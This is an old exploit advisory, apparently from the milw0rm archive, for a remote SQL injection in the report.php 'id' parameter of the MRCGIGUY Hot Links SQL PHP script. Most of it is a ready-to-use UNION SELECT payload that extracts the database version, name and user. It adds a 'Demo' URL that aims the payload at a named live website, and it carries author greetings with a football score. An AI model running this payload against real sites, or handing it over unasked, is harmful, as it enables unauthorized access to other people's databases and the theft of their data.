MRCGIGUY Hot Links SQL (PHP) (report.php id) Remote SQL Injection
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://www.mrcgiguy.com
Special Thx: All Muslims All Members Of Team Algerien Of FootBall
Note: Algerie 3-1 Egypt
Exploit:
------
SQL INJECTION:
-------------
http://wwww.victim.com/report.php?id=[SQL CODE]
[ SQL CODE]=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--
Demo:
----
http://www.myhotlinks.net/hlphpsql/report.php?id=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--
# milw0rm.com [2009-06-09]